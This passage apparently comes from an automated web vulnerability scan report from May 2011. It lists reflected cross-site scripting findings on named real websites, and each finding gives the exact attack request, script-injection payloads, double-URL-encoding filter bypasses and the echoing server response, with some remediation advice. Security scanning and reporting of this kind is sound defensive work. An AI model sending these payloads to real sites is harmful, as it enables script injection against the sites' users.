This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /favicon.ico?59d00-->a98bd1eb681=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.royal.gov.uk
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:21:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=rzswhj55rw43vlauyketp355; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 5961


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"[]><html xmlns="http://www.w3.org/1999/xhtml" xmlns:Abseil="http://www.coraider.c
...[SNIP]...
<!-- RealPage 404;http://www.royal.gov.uk:80/favicon.ico?59d00-->a98bd1eb681=1 -->
...[SNIP]...

6.91. http://www.sbc.net/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sbc.net
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 23209<a>ddb84a28b29 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico23209<a>ddb84a28b29 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sbc.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Wed, 04 May 2011 03:03:56 GMT
Content-Length: 27792
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCAQDTARB=CKAJMHODPLKFKPAININAGGCK; path=/
Cache-control: private


<html>
<head>

<title>Southern Baptist Convention - Terms of Use</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<script language="JavaScript">
<!--

fun
...[SNIP]...
<b>http://www.sbc.net/favicon.ico23209<a>ddb84a28b29</b>
...[SNIP]...

6.92. http://www.silvalifesystem.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.silvalifesystem.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f029"><a>a199bee6dad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico9f029"><a>a199bee6dad HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.silvalifesystem.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 01:40:15 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.8
Set-Cookie: PHPSESSID=fbaeu5sr4qu6bq99kmdjj4djj6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6312

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
               <script type="tex
...[SNIP]...
<meta name="keywords" content=",Favicon.ico9f029"><a>a199bee6dad" />
...[SNIP]...

6.93. http://www.smokin4free.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smokin4free.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b868e"><script>alert(1)</script>373ca93dc9a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b868e"><script>alert(1)</script>373ca93dc9a HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.smokin4free.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:06:03 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Set-Cookie: PHPSESSID=df9137a3abb36dcbc9c200cba781bff5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 17759

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Page not found.</title>
<meta name="keywords" content="cigarette, cigarettes, online shopping, smoke, store,
...[SNIP]...
<a class="menu-signin" href="/signin.html?referer=/b868e"><script>alert(1)</script>373ca93dc9a">
...[SNIP]...

6.94. http://www.sothebysrealty.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sothebysrealty.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cc5d"onerror%3d"alert(1)"343db407a58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3cc5d"onerror="alert(1)"343db407a58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /favicon.ico?3cc5d"onerror%3d"alert(1)"343db407a58=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sothebysrealty.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 20847
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=mwl5qa55jr2xjbalh3of0aqd; path=/; HttpOnly
Set-Cookie: LanguagePreference=eng; expires=Thu, 03-May-2012 02:05:17 GMT; path=/
Set-Cookie: LanguagePreference=eng; expires=Thu, 03-May-2012 02:05:17 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:05:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
           Page Not F
...[SNIP]...
<img alt="DCSIMG" id="DCSIMG" width="1" height="1"
src="http://statse.webtrendslive.com/dcsfhi2rb10000o2ujlbas1fp_9n3h/njs.gif?dcsuri=/eng/favicon.ico?3cc5d"onerror="alert(1)"343db407a58=1&WT.js=No&WT.tv=1.0.7"/>
...[SNIP]...

6.95. http://www.sourcingmap.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcingmap.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7d3a4"-alert(1)-"02495b7bd57 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico7d3a4"-alert(1)-"02495b7bd57 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sourcingmap.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 04 May 2011 01:09:36 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.6
Set-Cookie: cookie_test=please_accept_for_session; expires=Fri, 03-Jun-2011 01:09:34 GMT; path=/; domain=sourcingmap.com
Set-Cookie: osCsid=36369e11f5df6c7ef158b438f9cfd959; path=/; domain=sourcingmap.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: customers_landing_page=http%3A%2F%2Fwww.sourcingmap.com%2Ffavicon.ico7d3a4%22-alert%281%29-%2202495b7bd57; expires=Thu, 05-May-2011 01:09:34 GMT; path=/; domain=sourcingmap.com
Content-Length: 69873

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="en">
<head>
<meta http-equiv="Content-Type" content="tex
...[SNIP]...
<script type="text/javascript">
var xajaxRequestUri="http://www.sourcingmap.com/favicon.ico7d3a4"-alert(1)-"02495b7bd57";
var xajaxDebug=false;
var xajaxStatusMessages=false;
var xajaxWaitCursor=true;
var xajaxDefinedGet=0;
var xajaxDefinedPost=1;
var xajaxLoaded=false;
function xajax_get_category_product(){return xaja
...[SNIP]...

6.96. http://www.sweet-babies.ws/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sweet-babies.ws
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d226"><script>alert(1)</script>93a2b091227 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?5d226"><script>alert(1)</script>93a2b091227=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sweet-babies.ws
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:44:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 883


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<title>Teen-Babies.com Sweet-Babies.com Fantasia-Models.com </title>
<META name
...[SNIP]...
<frame src="http://94.102.48.184/favicon.ico?5d226"><script>alert(1)</script>93a2b091227=1" frameborder="0" />
...[SNIP]...

6.97. http://www.swiftpage5.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.swiftpage5.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 34e58%253cscript%253ealert%25281%2529%253c%252fscript%253e05f53afd2be was submitted in the REST URL parameter 1. This input was echoed as 34e58<script>alert(1)</script>05f53afd2be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /favicon.ico34e58%253cscript%253ealert%25281%2529%253c%252fscript%253e05f53afd2be HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.swiftpage5.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 File Not Found
Connection: close
Date: Wed, 04 May 2011 01:18:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 592


               <html>
                   <head>
                       <title>404 File Not Found</title>
                   </head>
                   <body>
                       <H1>404 File Not Found</H1>
                       <br><br><br><br>
                       Full URL: http://www.swiftpage5.com/Spe404.aspx?404;http://www.swiftpage5.com:80/favicon.ico34e58<script>alert(1)</script>05f53afd2be<br>
...[SNIP]...

6.98. http://www.swiftpage5.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.swiftpage5.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 21f8f<script>alert(1)</script>527b110edab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?21f8f<script>alert(1)</script>527b110edab=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.swiftpage5.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 File Not Found
Connection: close
Date: Wed, 04 May 2011 01:18:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 592


               <html>
                   <head>
                       <title>404 File Not Found</title>
                   </head>
                   <body>
                       <H1>404 File Not Found</H1>
                       <br><br><br><br>
                       Full URL: http://www.swiftpage5.com/Spe404.aspx?404;http://www.swiftpage5.com:80/favicon.ico?21f8f<script>alert(1)</script>527b110edab=1<br>
...[SNIP]...

6.99. http://www.swiftpage7.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.swiftpage7.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4f6e0%253cscript%253ealert%25281%2529%253c%252fscript%253e1f3a90088d5 was submitted in the REST URL parameter 1. This input was echoed as 4f6e0<script>alert(1)</script>1f3a90088d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /favicon.ico4f6e0%253cscript%253ealert%25281%2529%253c%252fscript%253e1f3a90088d5 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.swiftpage7.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 File Not Found
Date: Wed, 04 May 2011 03:56:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 592


               <html>
                   <head>
                       <title>404 File Not Found</title>
                   </head>
                   <body>
                       <H1>404 File Not Found</H1>
                       <br><br><br><br>
                       Full URL: http://www.swiftpage7.com/spe404.aspx?404;http://www.swiftpage7.com:80/favicon.ico4f6e0<script>alert(1)</script>1f3a90088d5<br>
...[SNIP]...

6.100. http://www.swiftpage7.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.swiftpage7.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload cf566<script>alert(1)</script>20e1a73723a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?cf566<script>alert(1)</script>20e1a73723a=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.swiftpage7.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 File Not Found
Date: Wed, 04 May 2011 03:56:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 592


               <html>
                   <head>
                       <title>404 File Not Found</title>
                   </head>
                   <body>
                       <H1>404 File Not Found</H1>
                       <br><br><br><br>
                       Full URL: http://www.swiftpage7.com/spe404.aspx?404;http://www.swiftpage7.com:80/favicon.ico?cf566<script>alert(1)</script>20e1a73723a=1<br>
...[SNIP]...

6.101. http://www.swiftpage8.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.swiftpage8.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5f5e9%253cscript%253ealert%25281%2529%253c%252fscript%253e0ee45c0162c was submitted in the REST URL parameter 1. This input was echoed as 5f5e9<script>alert(1)</script>0ee45c0162c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /favicon.ico5f5e9%253cscript%253ealert%25281%2529%253c%252fscript%253e0ee45c0162c HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.swiftpage8.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 File Not Found
Date: Wed, 04 May 2011 02:04:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 592


               <html>
                   <head>
                       <title>404 File Not Found</title>
                   </head>
                   <body>
                       <H1>404 File Not Found</H1>
                       <br><br><br><br>
                       Full URL: http://www.swiftpage8.com/spe404.aspx?404;http://www.swiftpage8.com:80/favicon.ico5f5e9<script>alert(1)</script>0ee45c0162c<br>
...[SNIP]...

6.102. http://www.swiftpage8.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.swiftpage8.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e60a6<script>alert(1)</script>2d581a1d9a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?e60a6<script>alert(1)</script>2d581a1d9a=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.swiftpage8.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 File Not Found
Date: Wed, 04 May 2011 02:04:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 590


               <html>
                   <head>
                       <title>404 File Not Found</title>
                   </head>
                   <body>
                       <H1>404 File Not Found</H1>
                       <br><br><br><br>
                       Full URL: http://www.swiftpage8.com/spe404.aspx?404;http://www.swiftpage8.com:80/favicon.ico?e60a6<script>alert(1)</script>2d581a1d9a=1<br>
...[SNIP]...

6.103. http://www.theamericanmonk.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.theamericanmonk.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b343e"><script>alert(1)</script>50991e09f46 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icob343e"><script>alert(1)</script>50991e09f46 HTTP/1.1
Host: www.theamericanmonk.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5cb03221148399a25dd09778513498e6; __utmz=63675568.1304488484.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=63675568.836338964.1304488484.1304488484.1304488484.1; __utmc=63675568; __utmb=63675568.1.10.1304488484; sess_=ysv9sd684163c3y; lastvisit=1304488486; km_lv=1304488488; ref_=mr_7; vid=206617815

Response

HTTP/1.0 404 Not Found
Date: Wed, 04 May 2011 00:55:46 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 82616

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
           
<script type="te
...[SNIP]...
<input type="hidden" name="atag" value="/favicon.icob343e"><script>alert(1)</script>50991e09f46" />
...[SNIP]...

6.104. http://www.theamericanmonk.com/members/forgot-password [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.theamericanmonk.com
Path:   /members/forgot-password

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f32cb"><script>alert(1)</script>5a6090d4a1c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /membersf32cb"><script>alert(1)</script>5a6090d4a1c/forgot-password HTTP/1.1
Host: www.theamericanmonk.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Date: Wed, 04 May 2011 00:55:38 GMT
Server: Apache
Set-Cookie: PHPSESSID=109d9f90dd2cbea343f456c5ceb07cad; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 82678

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
           
<script type="te
...[SNIP]...
<input type="hidden" name="atag" value="/membersf32cb"><script>alert(1)</script>5a6090d4a1c/forgot-password" />
...[SNIP]...

6.105. http://www.uww.edu/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.uww.edu
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f6b1"-alert(1)-"e1d7540cf67 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico?8f6b1"-alert(1)-"e1d7540cf67=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.uww.edu
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 4906
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:02:01 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><meta http-
...[SNIP]...
<script type="text/javascript">
   var query = "favicon.ico?8f6b1"-alert(1)-"e1d7540cf67=1";
   $(document).ready(function () {
       $("input#q").val(query);
       // submit new search
       $("#searchB").click(function () {
           var q = $("#q").val();
           $(this).attr("href", "http://search.uww.ed
...[SNIP]...

6.106. http://www.wine.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wine.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d17b8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6dd24e38d99 was submitted in the REST URL parameter 1. This input was echoed as d17b8"><script>alert(1)</script>6dd24e38d99 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /favicon.icod17b8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6dd24e38d99 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wine.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 00:47:34 GMT
Server: Microsoft-IIS/6.0
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
X-Powered-By: ASP.NET
Content-Type: text/html
Set-Cookie: SessionGUID=BA81B997%2D6B2F%2D417B%2D84CC%2D14E93D8EC11A; expires=Thu, 03-May-2012 00:47:34 GMT; domain=www.wine.com; path=/
Set-Cookie: ASPSESSIONIDCADBSCTT=JPPLONODBJOLIALDLGAOENCM; path=/
Cache-control: private
Set-Cookie: SL_Audience=72|Accelerated|112|1|0;Expires=Fri, 03-May-13 00:47:34 GMT;Path=/;Domain=.wine.com
Set-Cookie: __utmv=32446520.SL_TS_Accelerated;Expires=Fri, 03-May-13 00:47:34 GMT;Path=/;Domain=.wine.com
Content-Length: 24240


<html>
<head>
   <title>Wine.com - Page Not Found</title>
   
<link rel="stylesheet" type="text/css" href="http://www.wine.com/includes/css/defaultsixC.css" />
<script language="JavaScript" type="t
...[SNIP]...
<input type="hidden" name="404;http://www.wine.com:80/favicon.icod17b8"><script>alert(1)</script>6dd24e38d99" value="" />
...[SNIP]...

6.107. http://www.courts.info/favicon.ico [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.courts.info
Path:   /favicon.ico

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 55832<script>alert(1)</script>0884fff0392 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

